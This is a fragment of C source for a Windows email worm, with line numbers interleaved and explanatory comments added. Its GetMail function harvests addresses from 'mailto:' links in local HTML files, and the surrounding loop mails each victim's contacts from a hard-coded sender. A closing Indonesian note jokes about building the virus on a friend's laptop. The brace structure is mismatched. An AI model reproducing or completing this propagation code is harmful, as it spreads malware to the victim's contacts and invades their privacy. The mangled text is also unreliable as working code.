 /* Full path of the current match; GetMail() leaves `mail` empty when it
    finds no address. */
 wsprintf(buff, "%s\\%s", wild, fdata.cFileName);
440
 GetMail(buff, mail);
441
 if(strlen(mail)>0)
442
 {
443
 /* Hard-coded sender name set by the original author. */
444
 SendMail(subs[counting], "shadow_angel@undergroundfc.com", mail, texts[counting]);
445
 counting++;
446
 {
447
 if(counting == 10)
448
 {
449
 counting = 0;
450
 }
451
 if(!FindNextFile(fh, &fdata))
452
 {
453
 FindClose(fh);
454
 return;
455
 }
456
 }
457
 }
458
 }
459
}
460

461
/*
 * Analyst note: extracts the first e-mail address that follows a "mailto:"
 * marker in the file `name` and stores it in the caller's buffer `mail`.
 *   name - path of the file to scan
 *   mail - output buffer; set to an empty string first, at most 127
 *          characters plus terminator are written
 * The file is opened read-only and memory-mapped. Files of fewer than 256
 * bytes are ignored and the last 100 bytes are excluded from the scan.
 * Copying stops at a double quote (34) or a single quote (39); spaces are
 * skipped. The result is kept only if an '@' was copied, otherwise `mail`
 * is reset to empty.
 * Defensive view: local HTML files (saved pages, presumably also cached web
 * content - the callers decide which folders are searched) are the source
 * of recipient addresses, so recipients are people and sites the victim has
 * dealt with.
 */
void GetMail(char *name, char *mail)
462
{
463
 HANDLE fd,fd2;
464
 char *mapped;
465
 DWORD size, i, k;
466
 BOOL test = FALSE, valid = FALSE;
467
 mail[0]=0;
468
 fd=CreateFile(name,GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_ARCHIVE, 0);
469
 if(fd == INVALID_HANDLE_VALUE)
470
 {
471
 return;
472
 }
473

474
 size = GetFileSize(fd,NULL);
475

476
 if(!size)
477
 {
478
 return;
479
 }
480

481
 /* Small files are skipped. */
 if(size < 256)
482
 {
483
 return;
484
 }
485

486
 /* Scan limit: everything except the final 100 bytes. */
 size -= 100;
487
 fd2 = CreateFileMapping(fd, 0, PAGE_READONLY, 0, 0, 0);
488
 if(!fd2)
489
 {
490
 CloseHandle(fd);
491
 return;
492
 }
493

494
 mapped = (char *)MapViewOfFile(fd2, FILE_MAP_READ, 0, 0, 0);
495
 if(!mapped)
496
 {
497
 CloseHandle(fd);
498
 return;
499
 }
500

501
 i = 0;
502

503
 /* Stop at the first "mailto:" occurrence (test becomes TRUE). */
 while(i < size && !test)
504
 {
505
 if(!strncmp("mailto:", mapped + i, strlen("mailto:")))
506
 {
507
 test = TRUE;
508
 i += strlen("mailto:");
509
 k = 0;
510
 /* Copy until a quote character, the scan limit or 127 characters. */
 while(mapped[i]!=34 && mapped[i]!=39 && i < size && k < 127)
511
 {
512
 if(mapped[i] != ' ')
513
 {
514
 mail[k] = mapped[i];
515
 k++;
516

517
 /* An '@' marks the copied text as an address. */
 if(mapped[i] == '@')
518
 {
519
 valid=TRUE;
520
 }
521
 }i++;
522
 }mail[k] = 0;
523
 }else
524
 {i++;
525
 }}
526
 /* No '@' seen: discard whatever was copied. */
 if(!valid){
527
 mail[0] = 0;
528
 UnmapViewOfFile(mapped);
529
 CloseHandle(fd);
530
 return;
531
 }
532
}



Note : Pembuatan virus nya alangkah lebih indah di buat pake laptop temen anda coz takut nya malah jadi senjata makan tahu entar .... kekekekekkekke